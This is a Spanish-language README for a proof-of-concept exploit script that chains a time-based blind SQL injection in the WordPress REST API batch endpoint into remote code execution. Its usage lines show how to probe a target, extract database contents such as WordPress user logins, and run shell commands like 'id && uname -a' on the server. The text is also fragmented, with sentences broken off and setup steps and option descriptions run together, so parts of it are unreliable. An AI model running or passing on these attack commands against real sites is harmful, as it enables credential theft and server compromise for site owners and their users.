
CVE-2026-63030 & CVE-2026-60137 Wp2shell Poc
poc_wp_tot.py es una prueba de concepto (PoC) para explotar la vulnerabilidad
de inyección SQL ciega basada en tiempo en el endpoint batch de la WordPress REST API
y realizar una cadena de escalada hasta la ejecución remota de código (RCE).
poc_wp_tot.py en su directorio de trabajo.python3 -m venv venv
source venv/bin/activate

El script ofrece tres modos de operación: probe (detección), extract (extracción de datos) y rce (ejecución de comandos). A continuación se muestran ejemplos de uso.
python3 poc_wp_tot.py https://target.example.com/
python3 poc_wp_tot.py -v https://target.example.com/ "SELECT user_login FROM wp_users LIMIT 1"
python3 poc_wp_tot.py https://target.example.com/ -c "id && uname -a"
-h, --help : Muestra el mensaje de ayuda-v, --verbose: Activa la salida verbosa (depuración)-c <COMMAND> : Modo RCE: ejecuta comandos de shell en el objetivoSLEEP() se ejecute en el servidor objetivo
como condición booleana (SQLi ciega basada en tiempo).poc_wp_tot.py.calibrate(), get_scalar()
y exploit_rce() en el script.